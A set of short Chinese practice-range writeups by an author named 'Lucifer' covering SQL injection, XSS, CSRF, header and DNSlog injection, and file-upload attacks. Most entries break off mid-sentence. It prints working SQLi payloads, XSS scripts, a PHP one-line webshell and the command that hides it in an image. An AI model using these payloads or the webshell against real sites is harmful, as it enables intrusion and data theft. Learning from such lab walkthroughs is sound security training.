Lucifer-延时注入Writeup
1进入靶场url输入?id=1’存在注入点输入?id=1’ or 1=1%23显示登录成功?id=1’ and if(length(database())>5,sleep(5),1)%23过了5秒显示了画面,数据库的长度大于5 然后猜数据库的名字If(Ascii(substr(database(),1,1))=115,sleep(5),1)%23……最终数据库的名字为securit
Lucifer-CSRF Writeup
进入CSRF靶场首先看到了是dedeCMS然后百度dedeCMS CSRF漏洞,有一篇文章https://xz.aliyun.com/t/2237首先会在inc文件中写入一句话这是payload,当然要登录,知道管理员的账号和密码,账号是admin,密码为admin123http://120.203.13.75:8123/csrf/uploads/dede/sys_verifies.php?act
Lucifer-存储型XSS Writeup
进入存储型XSS靶场发现是FineCMS然后我们百度一下FineCMS存储型XSS的漏洞进入登录界面在后面拼接<script>alert(1)</script>弹窗,然后插入XSS平台payload查看XSS平台 ,得到flag
Lucifer-dom型XSSWriteup
进入dom型XSS靶场首先输入XSS经典弹窗语句<script>alter(1)</script>逢空就插发现没有用发现是被html实体化了,然后感觉无从下手了忽然看到有个位置可能和url中传参有关系果然能把url参数返回进一步尝试<script>alert(1)</script>注意不要使用Chrome浏览器会拦截果然弹窗了还有一种方法,就是将&l
Lucifer-反射型XSSWriteup
进入反射型XSS靶场很鬼畜,但还得看下去既然是XSS的题目,先使用通用的<script>alert(1)</script>发现没有什么反应,然后审查元素发现没有进行闭合,于是在前面加上双引号,后面加上注释//感觉乍一看没有什么问题,但用html编辑查看发现双引号被html实体化了尝试使用单引号发现被转义的惨不忍睹,尝试一下oninput,就是在输入的时候被触发输入’onin
Lucifer-head注入Writeup
进入head注入靶场1、 需要安装chrome的modheader,插件的网址为http://chromecj.com/web-development/2018-04/1029.html下载完会显示无法安装,需要打开开发者模式,就可以安装成功了进入靶场,1',updatexml(1,concat(0x7e,(select database()),0x7e),1),1)#显示’~
Lucifer-盲注Writeup
1. 要求输入id,输入?id=1’观察并输入?id=1’ or 1=1%23,%23代表#注释显示登录成功下一步需要猜字段个数,输入?id=1’order by 3%23得到有三个字段猜测数据库名的长度?id=1%27%20and%20length(database())<=8%23数据库名长度为8测第一个字符?id=1%27%20and%20ascii(substr(data
Lucifer-post注入Writeup
这次的题目为post注入,共三道题1、进入靶场,看见有个表单,想到post注入在username尝试使用万能密码进行注入,输入’ or 1=1 #显示sql语句和用户名和密码用order by猜测字段的个数,从10开始猜,使用二分法,在’ order by 2 #时正确,有两个字段使用'and 1=2 union select 1,database()#爆出数据库继续' and 1
Lucifer-DNS注入Writeup
DNSlog靶场无回显但可以DNSlog注入进入靶场输入?id=1,能正常显示,再输入’测试有无注入点正常,有注入点,猜测字段个数发现有waf,用最简单的方式,添加子目录1.txt,为信任的文件后缀,就可以绕过waf了使用联合查询,把想要的库名、表名等显示在DNSlog平台上,会有访问记录http://120.203.13.75:8120/index3.php/1.txt?id=1%20and%2
Lucifer-文件上传漏铜Writeup
文件上传漏洞制作图片马,选一张自己喜欢的图片(越小越好)和一句话木马(选择的是php的一句话木马,<?php @eval($_post[‘a’])?>)的文件,打开cmd,用copy命令,copy 1.jpg/b+1.txt baby.jpg就成功做出了一个图片马Pass-01 前端验证绕过